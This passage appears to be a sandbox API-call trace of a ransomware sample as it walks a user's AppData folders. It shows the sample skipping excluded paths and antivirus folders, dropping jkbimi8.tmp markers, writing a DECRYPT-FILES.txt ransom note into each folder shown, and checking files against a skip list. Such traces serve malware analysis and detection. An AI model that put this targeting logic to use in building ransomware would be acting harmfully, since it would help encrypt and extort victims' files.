lpString2="sys") returned 1 [0077.990] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0077.991] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.991] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\" [0077.991] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\jkbimi8.tmp" [0077.991] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.991] CloseHandle (hObject=0x0) returned 0 [0077.991] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.991] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.991] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.991] CloseHandle (hObject=0x448) returned 1 [0077.992] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS Project", cAlternateFileName="MSPROJ~1")) returned 1 [0077.992] lstrcmpW (lpString1="MS Project", lpString2=".") returned 1 [0077.992] lstrcmpW (lpString1="MS Project", lpString2="..") returned 1 [0077.992] lstrcatW (in: lpString1="MS Project", lpString2="\\" | out: lpString1="MS Project\\") returned="MS Project\\" [0077.992] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="MS Project\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\" [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Program Files") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch=":\\Windows") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Games\\") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\All Users") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="AhnLab") returned 0x0 [0077.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.992] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0077.992] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.992] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\\\jkbimi8.tmp") returned 79 [0077.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.994] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0077.994] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.994] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\\\DECRYPT-FILES.txt") returned 85 [0077.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.994] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.995] CloseHandle (hObject=0x44c) returned 1 [0077.995] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0077.995] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0077.995] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.996] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.996] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.996] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.996] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.996] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0077.996] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0077.996] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0077.996] lstrcatW (in: lpString1="14", lpString2="\\" | out: lpString1="14\\") returned="14\\" [0077.996] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\" [0077.996] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Program Files") returned 0x0 [0077.996] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch=":\\Windows") returned 0x0 [0077.996] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Games\\") returned 0x0 [0077.996] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\All Users") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="AhnLab") returned 0x0 [0077.997] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.997] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0077.997] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.997] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\\\jkbimi8.tmp") returned 82 [0077.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0077.998] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0077.998] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.998] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\\\DECRYPT-FILES.txt") returned 88 [0077.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0077.999] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0078.000] CloseHandle (hObject=0x454) returned 1 [0078.000] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0078.000] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*" [0078.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0078.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.000] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.000] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.000] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.000] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8e064c0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0078.000] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0078.000] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0078.000] lstrcatW (in: lpString1="1033", lpString2="\\" | out: lpString1="1033\\") returned="1033\\" [0078.000] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpString2="1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" [0078.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Program Files") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch=":\\Windows") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Games\\") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\All Users") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="AhnLab") returned 0x0 [0078.001] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.001] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0078.001] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.001] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\\\jkbimi8.tmp") returned 87 [0078.001] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0078.002] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0078.002] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.002] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\\\DECRYPT-FILES.txt") returned 93 [0078.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0078.002] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0078.003] CloseHandle (hObject=0x45c) returned 1 [0078.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0078.004] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*" [0078.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0078.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.004] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.004] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.004] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.004] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e064c0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0xfee79d60, ftLastWriteTime.dwHighDateTime=0x1d3aab9, nFileSizeHigh=0x0, nFileSizeLow=0x5f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="DECRYPT-FILES.txt") returned 1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="autorun.inf") returned 1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="boot.ini") returned 1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="desktop.ini") returned 1 [0078.004] lstrcmpiW 